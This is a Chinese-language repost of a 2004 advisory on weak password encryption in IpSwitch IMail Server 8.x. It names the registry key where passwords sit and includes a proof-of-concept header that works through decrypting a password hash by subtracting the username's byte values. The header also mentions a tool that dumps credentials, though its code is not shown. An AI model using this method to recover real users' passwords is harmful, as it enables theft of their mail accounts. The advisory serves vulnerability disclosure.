IpSwitch IMail Server弱加密算法漏洞
2008-04-09 04:27:46来源:互联网 阅读 ()
发布日期:2004-08-16
更新日期:2004-08-18
受影响系统:
Ipswitch IMail 8.1描述:
Ipswitch IMail 8.0.5
Ipswitch IMail 8.0.3
BUGTRAQ ID: 10956
Ipswitch IMail server是一款基于WEB的邮件解决方案。
IpSwitch IMail Server使用弱加密算法加密用户密码,本地攻击者可以利用这个漏洞恢复密码信息。
IpSwitch IMail Server使用'polyalphabetic Vegenere cipher'加密算法加密用户密码。此加密机制可以很方便的破解,要解密用户密码需要一密钥,IMail使用用户名作为密钥进行用户密码加密。用户把密码信息存在在注册表中:
"HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password"
在对密码解密前必须转换用户名中所有大写字母为小写字母。
<*来源:Adik (netmaniac@hotmail.KG)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109270420221701&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*************************************************************************************************
* IpSwitch IMail Server <= ver 8.1 User Password Decryption
*
* by Adik < netmaniac[at]hotmail.KG >
*
* IpSwitch IMail Server uses weak encryption algorithm to encrypt its user passwords. It uses
* polyalphabetic Vegenere cipher to encrypt its user passwords. This encryption scheme is
* relatively easy to break. In order to decrypt user password we need a key. IMail uses username
* as a key to encrypt its user passwords. The server stores user passwords in the registry under the key
* "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
* Before decrypting password convert all upper case characters in the username to lower case
* characters. We use username as a key to decrypt our password.
* In order to get our plain text password, we do as follows:
* 1) Subtract hex code of first password hash character by the hex code of first username character.
* The resulting hex code will be our first decrypted password character.
* 2) Repeat above step for the rest of the chars.
*
* Look below, everythin is dead simple ;)
* eg:
*
* USERNAME: netmaniac
* PASSWORDHASH: D0CEE7D5CCD3D4C7D2E0CAEAD2D3
* --------------------------------------------
*
* D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3 <- password hash
* - 6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61 <- hex codes of username
* n e t m a n i a c n e t m a <- username is a key
* -----------------------------------------
* 62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72 <- hex codes of decrypted password
* b i s h k e k f o r e v e r <- actual decrypted password
*
*
* pwdhash_hex_code username_hex_code decrypted_password
* ------------------------------------------------------------------
* D0 - 6E (n) = 62 (b)
* CE - 65 (e) = 69 (i)
* E7 - 74 (t) = 73 (s)
* D5 - 6D (m) = 68 (h)
* CC - 61 (a) = 6B (k)
* D3 - 6E (n) = 65 (e)
* D4 - 69 (i) = 6B (k)
* C7 - 61 (a) = 66 (f)
* D2 - 63 (c) = 6F (o)
* E0 - 6E (n) = 72 (r)
* CA - 65 (e) = 65 (e)
* EA - 74 (t) = 76 (v)
* D2 - 6D (m) = 65 (e)
* D3 - 61 (a) = 72 (r)
* ------------------------------------------------------------------
*
* I've included a lil proggie to dump all the usernames/passwords from local machine's registry.
* Have fun!
* //Send bug reports to netmaniac[at]hotmail.KG
*
* Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
*
* [16/August/2004] Bishkek
**************************************************************************************************/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
